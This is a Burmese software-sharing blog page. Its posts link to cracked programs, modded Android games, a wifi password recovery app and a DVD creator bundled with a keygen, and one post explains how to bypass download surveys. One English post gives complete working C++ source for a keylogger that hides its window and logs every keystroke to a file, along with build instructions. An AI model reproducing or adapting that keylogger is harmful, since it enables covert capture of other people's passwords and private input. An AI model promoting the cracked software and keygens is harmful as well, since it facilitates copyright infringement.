Pages

Android အတြက္ Wifi Recovery ေဆာ့၀္လ္

ကဲ အားလံုးပဲခင္ဗ်ာ အခုဆို လူတိုင္းဖုန္းကိုင္ႏုိင္ပါတယ္။ အခုဆို wifi က ေနရာတကာရေနၿပီေလ။ အခုေျပာမွာက wifi password ဘုံုးတဲ့ေဆာ့၀ဲပါ သူက Andorid ဖုန္းမွာသံုးတဲ့ဟာ Huawei touch screen ဖုန္းေတြမွာ ေကာင္းေကာင္းသံုးလို႕ရတယ္ ဒီေဆာ့၀ဲကုိ သံုးမယ္ဆုိရင္ ဖုန္းကို root လုပ္ထားရမယ္ လုပ္ၿပီးရင္ေဆာ့၀္လ္ကိုဖြင့္လိုက္ ကိုယ္သံုးၿပီး password ကိုျပန္ျပလိမ့္မယ္။ သူမ်ားကိုေ၀မွ်လို႕အဆင္ေျပေအာင္လိုလိုမယ္မယ္ ျပန္ share ေပးထားတာျဖစ္ပါတယ္။
Wifi recovery

Download=> Link 1 | Link 2

Survey အခ်ိဳ႕ကို ေက်ာ္ခြျခင္း

အင္တာနက္ေပၚမယ္ တန္ဖိုးၾကီး Software ဒါမွမဟုတ္ တန္ဖိုးၾကီး ဖိုင္ေတြကို ေဒါင္းရာမွာတစ္ခ်ိဳ႕ဆိုဒ္ေတြက Survey ေတြနဲ႕ပိတ္ထားတတ္ပါတယ္..ျမန္မာႏိုင္ငံမယ္ေတာ့ ေက်ာ္လုိ႕မရပါဘူး..ဒါေပမယ့္ အခု ျဖစ္ႏိုင္မယ့္ေက်ာ္ခြနည္းေလး ေရးေပးလုိက္ပါတယ္.. အားလံုးကိုေတာ့ ေက်ာ္လုိ႕ရမွာမဟုတ္ပါဘူး.
တစ္ခ်ိဳ႕တစ္၀က္အတြက္ေတာ့ အသံုး၀င္ပါလိမ့္မယ္.စမ္းၾကည္ပါ ရေတာ့လဲအျမတ္ပါ :)
နည္းလမ္း ( 1 )
မိမိက Firefox အသံုးျပဳေနတဲ့သူဆိုရင္ Survey Page သို႕ေရာက္တာနဲ႕ Tool >> Options >> Content မွာ
Enable Java Script ကိုအမွန္ျခစ္ျဖဳတ္လိုက္ပါ..ၿပီးရင္ OK ႏွိပ္ၿပီး ျပန္ထြက္လိုက္ပါ..ၿပီးရင္ Reload ျပန္ဆြဲ
လိုက္ပါ..ဒါဆိုရင္ Survey Page ေပၚလာေတာ့မွာမဟုတ္ဘဲ Download Link ကို တန္းေရာက္သြားပါမယ္.
ေရာက္ၿပီဆိုတာနဲ႕ Enable Java Script ကိုအမွန္ျခစ္ျပန္တပ္ေပးၿပီး မိမိေဒါင္းလိုတဲ့ဖိုင္ကိုေဒါင္းႏိုင္ပါၿပီ...
ဒီနည္းလမ္းကေတာ့ Survey ေတာ္ေတာ္မ်ားမ်ားအတြက္ အသံုး၀င္ေက်ာ္ခြနည္းျဖစ္ပါတယ္..
ဒုတိယနည္း ( 2 )
Survey Page သို႕ေရာက္တာနဲ႕  ေအာက္ေဖာ္ျပပါ ကုဒ္ေတြကို Survey Page ရဲ႕ လိပ္စာကိုဖ်က္ပီး ကူးထည့္လုိက္ပါ..ၿပီးတာနဲ႕ Enter ေခါက္လိုက္ပါ..ဒါဆိုရင္ Survey ကို အလိုအေလ်ာက္ေက်ာ္ၿပီးသားျဖစ္ၿပီး
မိမိ ေဒါင္းလိုတဲ့ဖိုင္ကို ေဒါင္းလုိ႕ရပါလိမ့္မယ္...ဒီနည္းလမ္းကလဲ Survey အခ်ိဳ႕ကို ေက်ာ္ခြနည္းဘဲျဖစ္
ပါတယ္..ကဲ စမ္းၾကည့္ၾကပါ.. ေနာက္ပိုင္းေက်ာ္ခြနည္းေတြ ေတြ႕ရင္လည္း တင္ေပးသြားပါ့မယ္ခင္မ်ာ

How To Make Your Own Key Logger In Visual C++

Open Vissual C++
Go to File  -->     New
Select  Files Tab -->  Select  C++ Source File from list

Paste bellow code there
#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();
int main()
{
Stealth();
char i;
while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}
/* *********************************** */
int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;
FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");
cout << key_stroke << endl;
if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);
fclose (OUTPUT_FILE);
return 0;
}
/* *********************************** */
void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}
 Save it any where you like
 







Then go to Build       -->  Click Compile

 
Then again go to Build  --> Click  Build Cpp.Exe
Exit the C++
Go to the folder you have saved the data earlier
Go to Debug folder inside the folder
 


Click Cpp1.exe
Yes you are the owner of a keylogger
This Key Logger records all the keys pressed
Open log.txt to view the keys pressed
Use Task Manager to end the keylogger

Icon ေလးေတြ ကိုယ္တိုင္ လြယ္လြယ္ကူကူလုပ္ဖို႔ IconLover v 5.35 Full Version


IconLover နဲ႔ ကိုယ္ပိုင္ Icon ေလးေတြ ဖန္တီးလို႔ရပါတယ္.. ဒီေခတ္မွာ Online ကို တြင္တြင္က်ယ္က်ယ္သံုးလာၾကတဲ့အတြက္ Facebook ေပၚမွာ၊ Gtalk မွာ စသည္ျဖင့္ ကိုယ့္ရဲ႕ အမွတ္တံဆိပ္ေတြကို တင္ထားေလ့ရွိပါတယ္. ေမာင္ေပါက္ေတာင္မွ Icon ကိ္ု သိပ္ထူးထူးျခားျခားလုပ္မထားဘူး.. ဖေယာင္းတိုင္မီးလင္းေနတာေလးလုပ္ထားတာ.. အလွအပနဲ႔ ဒီဇိုင္းဆန္းဆန္း Icon ေလးေေတြဖန္တီးဖို႔ IconLover v 5.35 Full Version တင္ေပးလိုက္ပါၿပီဗ်ာ..

With 5:35 IconLover you can:
Manage icons, static and animated cursors, icon and cursor libraries and image lists.
Create and edit smooth semi-transparent icons, static and animated cursors for Windows XP.
Create and edit icons in standard and custom sizes, with color depth up to 32-bit True Color.
Make stylish icons from your images.
Paint images with gradients and fills.
Create multi-layer images.
Modify images with drop shadow, opacity, smoothing, negative, grayscale, colorization, rotation, roll and mirror effects.
Import and export ICO, BMP, JPEG, ANI, CUR, GIF, PNG, TGA, TIFF, WMF, WBMP, XPM, XBM and Adobe Photoshop PSD image formats.
Import Mac OS icons from icns file and RSRC files.
Manage icon libraries for better and more efficient image storage.
Extract icons from Windows executables, libraries and animated cursor files, ZIP and RAR archives.
Download icons from the Internet.
Modify icons inside executables.
Search in folders for icons and cursors.
Convert or apply effects to multiple icons at once.
Customize desktop and folder icons.

အဆင္ေျပပါေစ..

ေမာင္ေပါက္


Adobe Photoshop CS4 Portable Full Version Free Download

Adobe Photoshop CS4 Veteran set of powerful imaging tools streamlined user interface more extensible and customizable; completely overhauled 3D engine in Extended version. If you work with 3D, Photoshop Extended is a must-have upgrade; ditto if you think you'd use more of Standard's tools if the interface were less opaque, if you need to upgrade other suite applications, or if you qualify for an academic discount. All things considered, while Adobe Photoshop CS4 makes some improvements over CS3, it might be worth skipping this generation and waiting for the next.
There's just enough that's better in the CS4 updates to Photoshop and Photoshop Extended most notably, usability improvements for core features that many people will find themselves sighing, biting the bullet, and upgrading. If you work with video or 3D, or want to update your Creative Suite to CS4 for other reasons, this is a no brainer; for the rest of us, there's little you can do with CS4 that you couldn't do with CS3, and the latter seems a bit faster and more memory efficient in some respects.
The Web abounds with complaints about Adobe's installer and updater, and I think most are quite justified. Every Windows application installer suggests you close any running applications, but you can usually ignore it and 99 percent of the time everything works out fine. Adobe forces you to close your browser and all Microsoft Office applications, because many of the programs in the suite primarily Acrobat spread octopus like tentacles throughout your working environment. That's pretty appalling in and of itself, but in addition to wasting a large chunk of time installing, you can't do anything else but play Solitaire while it's happening. And as before with the updater, you'll get to relive this delightful close your apps or else experience on a regular basis. Even as I type it's stopped dead waiting for me to close Firefox. Plus, the installation "progress" bar bears no relation to reality whatsoever, with its two steps forward and one step back movement. Over and over again. All of this adds up to a one-point demerit for Adobe on its Setup and Interface rating.
Adobe Photoshop CS4 Extended users will benefit more immediately from these underlying changes than Standard users. For the latter, OpenGL support primarily manifests itself as some whizzy screen zooming and rotation tools that demo well but likely won't get used much. However, Adobe has greatly improved Extended's 3D support. It now offers most of the essential render settings and view controls, plus the ability to create primitives (and extend the library of primitives), necessary to work with 3D models. You edit and paint on textures simply by double-clicking on them in the Layers palette, then see your changes applied when you toggle back to the model; not quite real-time, interactive painting, but close enough for now. And now there's basic keyframe animation for 3D scenes. Still there's room for improvement: it needs better lighting handling and the ability to tile and more easily position textures, and several aspects of the interface, like the Rendering options, are still far too dialog driven. And Photoshop gets very slow when you load (or generate via the Mesh from grayscale command) relatively complex models with tens of thousands of polygons.
ကဲ လိုျခင္သူမ်ား ယူနိဳင္ဖို႕ ေအာ္ရဂ်င္နယ္  မူရင္းးအတိုင္းဘဲ တင္ေပးလိုက္တယ္ဗ်ာ...ကြန္ေတာ္လဲ ျပန္တင္ေပးဖို႕ အေျခေနမေပးတာေၾကာင့္လဲပါတာေပါ့..အဆင္ေျပမွာပါေနာ္... ေအာက္မွာ ေဒါင္းယူလိုက္ပါ

Download Link 1(Sharebeast):
Download Link 2(Datafilehost):

Adobe Premiere Pro CS3 Full Version Free Download

Adobe Premiere Pro CS3 video editor is that it's Windows Vista compatible and, for the first time in years, Mac compatible. Those updates apparently took most of Adobe's effort, however, because I identified some features that are either missing or not yet fully developed.
Adobe Premiere Pro accepts HDV (High Definition Video) footage, as it did in the previous version, but it still doesn't work with AVCHD (Advanced Video Codec High Definition) footage when some video editors Adobe says it may add AVCHD support after this initial release of the software.
Adobe now bundles its Encore DVD authoring software and the OnLocation application for setting up video shoots (determining lighting, sound levels, and so on). Encore adds support for Flash output and for Blu-ray Disc creation but shuns HD DVD, even though Adobe is a member of both disc formats' supporting associations.
Dynamic Link, a big feature added to last year's Production Studio suite, allows you to send projects from Premiere Pro to Adobe After Effects, or vice versa, without rendering them first a huge time saver. Premiere Pro has a new "Export to Encore" feature, but you must still render your timeline before you can work on it in Encore, so it doesn't seem that useful to me.
Adobe Premiere Pro CS3 has a few small features that I did find useful. A new Time Remapping function lets you implement slow motion (or fast motion) directly in the application's timeline simply by dragging a line on the clip. Though it makes the task easier, you have to right click and navigate a popup menu to tell Premiere what you want the line to do (the line also serves as an adjustment tool for other effects). It would be even better if you could play your clip and adjust the playback speed in real time. As it stands, you must make the adjustment and then play the clip (and on slower machines, you'll need to prerender before you can play the clip), and if it isn't what you want, you have to perform the process all over again. The function doesn't work on audio that's linked to the clip, either.
You can now create and open multiple asset bins (windows) of video, audio, and still-image source files. Open a bin in a new window, and you can drag and drop files into the order you want and then select which files to insert into a new video sequence, with default transitions automatically inserted. Plus, you can now substitute clips in a timeline without having to reimplement existing transitions and effects (you'll render the effects again, though).
Adobe Premiere Pro remains the gold standard of video editors, and I appreciate that Adobe bundles two applications with it instead of making you buy its expensive suite (rechristened Production Premium CS3) to get them. But other elements of this year's suite such as Soundbooth, an audio editing application that's designed for non prosare more compelling than Premiere Pro is on its own.
သူငယ္ခ်င္းတစ္ေယာက္  အျမန္ေတာင္းေနတာမို႕  ျပန္မတင္နိဳင္ေတာ့ပါဘူးး မူရင္းအတိုင္းဘဲ တင္ေပးလုိက္ပါတယ္.. အဆင္ေျပမယ္လို႕ ေမွ်ာ္လင့္ပါတယ္...
ေအာက္မွာ ေဒါင္းယူလုိက္ပါေနာ္

Download Link 1(Sharebeast):
Download Link 2(Datafilehost):

ျမန္မာတို႕ရဲ႕အလန္းတကာ့အလန္းဆံုး Shweyoe Dictionary Version 3.0 ( 10 MB )

4
ျမန္မာေတြ ထြင္ထားသမွ် Dictionary ေတြထဲမွာ နံပတ္ ( 1) အလန္းဆံုး ျဖစ္မယ့္ Dictionary လို႕က်ေနာ္
ထင္ပါတယ္.. အဂၤလိပ္ ၊ ရွရွား ၊ ထိုင္း ၊ ကိုရီးယား ၊ ဂ်ပန္ ဘာသာစကားငါးမ်ိဳးကေန ျမန္မာဘာသာလုိ႕
ေျပာင္းလဲႏိုင္ပါတယ္..မိမိသိခ်င္တဲ့စာလံုးကို အသံထြက္လည္းေျပာျပေပးႏိုင္ပါတယ္.. ဖြဲ႕စည္းမႈအသြင္အ
အျပင္လည္း ေသသပ္မႈရွိၿပီး အျခား Dictionary မ်ားထက္ အားသာတဲ့အခ်က္ေတြကေတာ့ ဒီအဘိဓာန္
ထဲမွာမပါတဲ့ စကားလံုးမ်ား ဘာသာျပန္မ်ားကို ထပ္မံေပါင္းထည့္ၿပီး မွတ္သားထားႏိုင္သလို.. အင္တာနက္
နဲ႕ခ်ိတ္ဆက္ထားမယ္ဆိုရင္ မိမိရွာလိုတဲ့ စကားလံုးဟာ ဒီအဘိဓာန္ထဲမွာမပါေသာ္လည္း နာမည္ၾကီး
စြယ္စံုက်မ္းဗဟုသုတ Website ၾကီးမ်ားျဖစ္တဲ့ Wikipedia နဲ႕ Wikitionary တုိ႕လို စြယ္စံု၀ဘ္ဆိုဒ္မ်ား
တြင္ အလိုအေလ်ာက္ရွာေဖြႏိုင္ပါေသးတယ္...ပညာရပ္နယ္ပယ္အသီးအသီးတြင္ ေလ့လာလိုက္စားေနၾက
ေသာ ေက်ာင္းသားေက်ာင္းသူမ်ား..ဆရာ .ဆရာမမ်ား အတြက္ အထူးအသံုး၀င္ဆံုး..ေဆာင္ထားဖို႕
အေကာင္းဆံုး ျဖစ္ၿပီး Online ေရာ.. .Offline ပါ Support ေပးတဲ့ ျမန္မာ့နံပတ္ 1 အဘိဓာန္ Software
ေကာင္းေလးတစ္ခုျဖစ္ပါတယ္ခင္မ်ာ...ဒီ Software ကိုအသံုးျပဳမယ္ဆိုရင္ မိမိစက္မွာ NetFraem 4 ထည့္
သြင္းထားဖို႕လိုအပ္ပါမယ္ခင္မ်ာ...

Download Dictionary ==> Link 1 / Link 2

DeadCrossing v1.05 Mod (Unlimited) Apk Game (22.1 Mb)

ဒီဂိမ္းေတာ့ေတာ္ ေတာ္ေတာ္လန္းတယ္ဗ်ာ ကားနဲ႔ သရဲေတြကုိ လိုက္နိုမ္နွင္းတဲ့ဂိမ္းေလးပါ 
လက္နက္အတြက္ေတာ့ မပူနဲ႔ စိတ္ၾကိဳက္၀ယ္ရတယ္ ပိုက္ဆံက Unlimited ဘဲ 
ကစားမယ္ဆို ေအာက္ကလိပ္စာမွာရယူနုို္င္ပါတယ္ 
Download>>>mirrorupload (or)sendspace (or)zippyshare

Fruit Ninja Apk 1.8.6 Mod Unlocked Apk Game (28.06 Mb)

Fruit Ninja ဂိမ္းကစားတဲ့သူငယ္ခ်င္းေတြ အတြက္ 20ရက္ေနထြက္ အပ္ဒိတ္ေလးပါ 
ကစားမယ္ဆိုရင္ ေအာက္လိပ္စာမွာရယူနုိင္ပါတယ္ 
Download>>>>mirrorupload (or)sendspace (or)sharebeast

Instagram v4.0.1 Apk (15.74 Mb)




 
Android ဖုန္း/Tablet ေတြအတြက္ ဇြန္လ ၂၁ ရက္ေန႕မွာေနာက္ဆုံးထြက္ရွိလာတဲ့ Instagram v4.0.1 ကုိတင္ေပးလုိက္ပါတယ္။ ဒီ version မွာေတာ့ Instagram ေဆာ့၀ဲကေန video ရုိက္ ၊ ဗီဒီယုိကုိ Instagram မွာပါတဲ့ effect ေတြနဲ႕ျပင္ဆင္ျပီး facebook ေပၚကုိတုိက္ရုိက္ ဗီဒီယုိတင္နုိင္တဲ့ features ပါ၀င္လာပါတယ္။ အျခား features ေတြျဖစ္တဲ့ ဓာတ္ပုံရုိက္ျပီး ကုိယ္ရုိက္တဲ့ဓာတ္ပုံကုိပုိလွသြားေအာင္ effect အမ်ိဳးမ်ိဳးထည့္သြင္းျခင္း ၊ Instagram ထဲမွာ အျခားသူငယ္ခ်င္းမ်ားတင္ထားတဲ့ ဓာတ္ပုံႏွင့္ video မ်ားကုိ comment ေပးျခင္း ၊ like ေပးျခင္းစတဲ့ features မ်ားလည္းျပဳလုပ္နိင္မွာျဖစ္ပါတယ္။
 အသံုးျပဳမယ္ဆို ေအာက္ကလိပ္စာမွာရယူုနိုင္ပါတယ္
Dwonload>>>>mirrorupload (or)zippyshare
 

YouTube အသံုျပဳနည္းစာအုပ္ (Ebook)

YouTube အသံုျပဳနည္းစာအုပ္ (Ebook)

 
Ebook ေတြမတင္ေပးရတာ နည္းနည္းၾကာလာလို႕ Ebook ေကာင္းေကာင္းေလးတစ္အုပ္မွ်ေ၀ေပးလိုက္ပါ တယ္ဗ်ာ။ YouTube အသံုးျပဳနည္းစာအုပ္ေလးပါ။ အခုေနာက္ပိုင္း ေတာ္ေတာ္မ်ားမ်ားေျပာေနၾကပါျပီ။ YouTube ကေနဆြဲလာတာ ၊ YouTube မွာတင္ထားတယ္ ရွာလိုက္နဲ႕ ေတာ္ေတာ္မ်ားမ်ား YouTube ကိုအသံုး မ်ားလာၾကပါျပီ။ ဒီစာအုပ္ေလးျမင္ေတာ့ ကၽြန္ေတာ္ထူးဆန္းတယ္ထင္သြားတာအမွန္ဘဲဗ်။ YouTube ဒီ ေလာက္လြယ္တာကို စာအုပ္ထြက္စရာလားဆိုျပီးအထင္ေသးသြားတယ္ဗ်ာ။ အဲဒါနဲ႕ဘဲ ေဒါင္းျပီး ဖတ္ ၾကည့္လိုက္ေတာ့မွာ တခ်ိဳ႕အေၾကာင္းအရာေတြကို ကၽြန္ေတာ္လည္း မသိေသးဘူးဗ်။ ေတာ္ေတာ္မ်ားမ်ား လည္း ဖတ္သင့္ပါတယ္ဗ်ာ။ သိျပီးသားလို႕ထင္ေနတဲ႕သူေတြလည္း ဖတ္ၾကည့္ေစခ်င္ပါတယ္။ YouTube အေၾကာင္းကို ျပည့္ျပည့္စံုစံုနဲ႕ေရးသားထားတဲ႕စာအုပ္ေလးျဖစ္ပါတယ္ဗ်ာ။ အဲအဲအဲ က်န္ခဲ႕ေတာ့မလို႕ ဒီစာအုပ္ေလးကို ေရးသားသူကေတာ့ ဆရာဦးေသာင္းဝင္း(ပန္းခ်ယ္ရီ) ျဖစ္ပါတယ္ဗ်ာ။ YouTube အေၾကာင္း ကိုျပည့္ျပည့္စံုစံုေရးသားထားပံုကေတာ့ စာမ်က္ႏွာေပါင္း ၉၅မ်က္ႏွာအထိပါ၀င္ပါတယ္ဗ်ာ။



**  Step-1.ေအာက္က Download Button ကိုႏွိပ္လိုက္ပါ  
**  Step-2. "5sec". ေလာက္ေစာင္႕ေပးပါ။

**  Step-3. "  << SKIP AD >>   ".ကိုႏွိပ္ေပးပါ။
**  Step-4. Download Link က်လာပါလိမ္႕မယ္။
**  အဆင္ေျပပါေစဗ်ာ။

DVD ေခြ အလြယ္တကူဖန္တီးၾကမယ္


Joboshare DVD Creator 3.4.9.0617 | 16 MB WITH KEYGEN

DVD ေခြ ဖန္တီးခ်င္တဲ့ သူငယ္ခ်င္းေတြအတြက္ ေဆာ့ဝဲေကာင္းေလးကို

ျပန္လည္မွ်ေဝလိုက္ပါတယ္။အစကေတာ့ လုပ္ျပမို႔ ဒီေကာင္ေလး ကို

မအားတာနဲ႔ ေဆာ့ဝဲ ကိုအရင္တင္လိုက္တယ္ ၿပီးေတာ့မွပဲ လုပ္နည္းေလးေတြေရးေတာ့မယ္

MENU ေတြ စာတန္းထိုးတာေတြ ကို ဒီေကာင္ေလးနဲ႔ လုပ္လို႔ရတယ္ဗ်


ေအာက္မွာသူ႔အေၾကာင္း ေရးထားတာေလးရွိတယ္ လုပ္ခ်င္တယ္ ဆို ဖတ္ၿပီးေတာ့

လုပ္ၾကည့္ပါ Keygen ေလးနဲ႔ေနာ္
MEDIAFIRE | ZIPPYSHARE | SHAREBEAST | BOX 


ကိုလတ္(ကြ်ဲဆင္း)




Joboshare DVD Creator - professional program for converting video file formats like AVI, MPEG, DAT, MPG, WMV, ASF, MP4, 3GP, VOB and burn them to DVD with the ability to edit and create menus. Allows you to specify NTSC or PAL, adjust the ratio of video 4: 3 or 16: 9, burn ISO files and DVD folders with the film. Supports many formats DVD, including DVD-R, DVD + R, DVD-RW, DVD + RW, DVD-5 and DVD-9. It has a simple and intuitive interface.

Features:
Create a full video DVD projects with burning (recording) on DVD media
Create a video DVD from AVI, MPEG, DAT, MPG, WMV, ASF, MP4, 3GP, VOB and other video formats
Create a full menu and subtitles
Choice of standard or custom setting pictures, bitrate, freymreyda, quality and other settings for DVD Video
Supports NTSC and PAL encoding
Support 4: 3 and 16: 9 aspect ratio picture
Preview results
Burn the project to DVD media
Support for DVD-R, DVD + R, DVD-RW, DVD + RW writing discs and drives
Create and burn ISO faylobraza
High speed operation
High quality results
Nice and easy interface

ေသနတ္ပစ္ၾကမယ္ ( ွSniper and Killer 3D )


ေသနတ္ပစ္ရတာ ၀ါသနာပါတဲ့ ေဘာ္ေဘာ္ေတြအတြက္ ေသနတ္ပစ္ရတဲ့ ဂိမ္း ေလးပါ ။
ေလွ်ာက္သြားလို့ေတာ့ မရပါဘူး သူသတ္မွတ္ထားတဲ့ေနရာကေနပဲ ရန္သူေတြကို ပစ္ရမွာပါ ။
အခန္း သံုးခန္းေပးထားပါတယ္ ။  ကိုယ္ၾကိဳက္တဲ့ အခန္းကို ေရြးၿပီး Level ၿမင့္ လာေအာင္ တၿဖည္းၿဖည္းေဆာ့ရတာပါ ။
ရန္သူေတြကလဲ အရမ္း လ်င္တယ္ဗ် ။ သူတို့လူ တစ္ေယာက္ ထိသြားတာနဲ့  ကိုယ့္ကို သဲၾကီးမဲၾကီး ကို ၿပန္ပစ္ၾကတယ္ဗ် ။
လက္နက္ကေတာ့ သံုးခုေပးထားပါတယ္ ။ အေ၀းပစ္ ေသနတ္ရယ္ ၊ ပစ္စတို ရယ္ လက္ပစ္ဗံုး ရယ္ပါ ။
က်ည္ဆံေတြ ေသနတ္ေတြကို လည္း upgrade လုပ္လို့ရပါတယ္ ။




ဂိမ္းကလည္း File Size  14 MB ေလာက္ပဲရွိပါတယ္ ။
လိုခ်င္တဲ့သူေတြ ေအာက္မွာ Mediafire Link ေလးေပးထားပါတယ္ဗ်ာ ………။
Download   Sniper   &   Killer   3D
အားလံုး OK ၾကပါေစ ………………….။

Lollipops 2


ကဲ ကြ်န္ေတာ္တို့ ေယာက္်ားေလးေတြ ဂိမ္း ေဆာ့ရင္ တကယ့္ အၾကီးၾကီးေတြေဆာ့ခ်င္ၾကေပမယ့္  မိန္းကေလးအမ်ားစုကေတာ့ ေဆာ့ရင္ ဒီလို ဂိမ္းေလးေတြကမ်ားတယ္ ။
ဖုန္းပ်က္မွာ ေၾကာက္ၾကလို့နဲ့တူပါတယ္ :P
ခု ဒီဂိမ္းေလးကလဲ ေကာင္မေလးေတြ ေတာ္ေတာ္မ်ားမ်ားၾကိဳက္မဲ့ ဂိမ္းပါ ။ ေဆာ့ရတာကလဲ ရိုးရိုးရွင္းရွင္းေလးပဲ ရုပ္ထြက္ေလးကလဲ မဆိုးပါဘူး ။
အပ်င္းေၿပေဆာ့ရင္ တအားေဆာ့လို့ေကာင္းတယ္လို့ အာမခံပါတယ္ ။

ကဲ ကဲ ေကာင္မေလးေတြ ဒီဂိမ္းကို ၾကိဳက္ၾကရင္ေတာ့ အေနာ့ကို မေမ့နဲ့ေနာ္ ………….  :P
ကိုၾကီးေတြ အတြက္ကေတာ့ ေနာက္မွ ခပ္ၾကမ္းၾကမ္းေလးတင္ေပးမယ္ေနာ္ ………။
ကိုၾကီးေတြလဲ ေဆာ့ခ်င္ရင္ ေအာက္မွာ ယူသြားႏုိင္ပါတယ္ဗ်ာ ………။
Download   Lollipops 2

Cafezee အသံုးျပဳနည္းစာအုပ္

အင္တာနက္ကေဖးေတြမွာ သံုးတဲ့ Cafezee ကို ဘယ္လိုသံုးၿပီး User ေတြကို ထိန္းခ်ဳပ္ထားရမလဲ.. ဘယ္လို Control လုပ္မလဲဆိုတာ ေရးသားထားတဲ့စာအုပ္ပါ.. Cafezee ေဆာ့ဖ္ဝဲကို Install လုပ္တာက စၿပီး အသံုးျပဳပံုအဆင့္ဆင့္ထိ ရွင္းျပထားပါတယ္.. အသံုးလိုသူမ်ား ေဒါင္းယူႏိုင္ၾကပါၿပီ..


အဆင္ေျပပါေစ..

ေမာင္ေပါက္


SIM ကဒ္ အခမဲ့ ႏွင့္ ဖုန္းေခၚခ ျပား ၈၀ ျဖစ္မည္


sim card

ဆက္သြယ္ေရး လုပ္ကိုင္ခြင့္နဲ႔ ပက္သတ္ၿပီး အၿပိဳင္အဆိုင္
ေလွ်ာက္ထားသည့္ ကုမၺဏီေပါင္း ၁၂ ခုအနက္မွ ျပင္သစ္အေျခစိုက္ 
Orange ဆက္သြယ္ေရး ကုမၺဏီတစ္ခုမွ ယေန႔ ဇြန္လ ၂၁ ရက္ေန႔ 
မြန္းလြဲပိုင္းက စာနယ္ဇင္း မိတ္ဆက္ပြဲ တစ္ရပ္ကို ရန္ကုန္ၿမိဳ႕ 
ဆီဒိုးနားဟိုတယ္ခန္းမ၌ က်င္းပ ခဲ့ပါသည္။
၎ကုမၼဏီက ျမန္မာ့ဆက္သြယ္ေရး အတြက္ လုပ္ပိုင္ခြင့္ ရရွိလာပါက (၅) ႏွစ္ အတြင္း တစ္တိုင္းတျပည္လံုး အတြက္ ျဖန္႔ခ်ိသြားမည္ဟုသိရပါသည္။

ေရြးခ်ယ္ခံရပါက SIM ကဒ္ကို အခမဲ့ ျဖန္႔ေဝမည္ျဖစ္ျပီး ေခၚဆိုခႏွဳန္းအျဖင့္ ၀.၈ က်ပ္ (ျပား ၈၀ ) ႏွဳန္းအျဖင့္ သတ္မွတ္ေပးမည္ဟုလည္း သိရပါသည္။


 







ဆက္သြယ္ေရး လုပ္ကိုင္ခြင့္နဲ႔ ပက္သတ္ၿပီး အၿပိဳင္အဆိုင္
ေလွ်ာက္ထားသည့္ ကုမၺဏီေပါင္း ၁၂ ခုအနက္မွ ျပင္သစ္အေျခစိုက္ 
Orange ဆက္သြယ္ေရး ကုမၺဏီတစ္ခုမွ ယေန႔ ဇြန္လ ၂၁ ရက္ေန႔ 
မြန္းလြဲပိုင္းက စာနယ္ဇင္း မိတ္ဆက္ပြဲ တစ္ရပ္ကို ရန္ကုန္ၿမိဳ႕ 
ဆီဒိုးနားဟိုတယ္ခန္းမ၌ က်င္းပ ခဲ့ပါသည္။
၎ကုမၼဏီက ျမန္မာ့ဆက္သြယ္ေရး အတြက္ လုပ္ပိုင္ခြင့္ ရရွိလာပါက (၅) ႏွစ္ အတြင္း တစ္တိုင္းတျပည္လံုး အတြက္ ျဖန္႔ခ်ိသြားမည္ဟုသိရပါသည္။

ေရြးခ်ယ္ခံရပါက SIM ကဒ္ကို အခမဲ့ ျဖန္႔ေဝမည္ျဖစ္ျပီး ေခၚဆိုခႏွဳန္းအျဖင့္ ၀.၈ က်ပ္ (ျပား ၈၀ ) ႏွဳန္းအျဖင့္ သတ္မွတ္ေပးမည္ဟုလည္း သိရပါသည္။

ဖုန္းအခ်င္း ဖိုင္ပုိ႔သူေတြအတြက္ bluetooth ထက္ ၁၀-ဆေလာက္ျမန္တဲ့ Zapya v1.7 Apk 7MB

zapya အသံုးျပဳတဲ့ သူငယ္ခ်င္းေတြအတြက္ ေနာက္ဆံုး Update ေလးပါ
ဒီေကာင္ေလးက bluetooth ထက္ တစ္ကယ္ကို ၁၀-ေလာက္ျမန္တယ္ဗ်ာ… 
သူက wifi connection ကိုသံုးထားတာပါ… zapya ကိုသံုးဖို႔အတြက္ သံုးမဲ့စက္အားလံုးမွာ
 zapya တင္ထားဖို႔ေတာ့လိုပါတယ္… wifi သံုးထားတဲ့အတြက္ network တစ္ခုဖန္တီးၿပီး
 အလံုးမ်ားစြာ ခ်ိတ္ဆက္လို႔ရပါတယ္… 
တစ္လံုးနဲ႔တစ္လံုး ခ်ိတ္ဆက္ၿပီးေတာ့ zapya game ေလးေတြလည္း ေဆာ့လို႔ရပါတယ္… 
တစ္ကယ္ကို ေပ်ာ္စရာေကာင္းပါတယ္… 
network တစ္ခုဖန္တီးဖို႔ကေတာ့ zapya ကိုဖြင့္ၿပီး connect to friends ဆိုတာကိုႏွိပ္လိုက္ပါ… 
ခ်ိတ္မယ့္သူထဲက တစ္ေယာက္က ဆာဗာေထာင္ရပါမယ္.. 
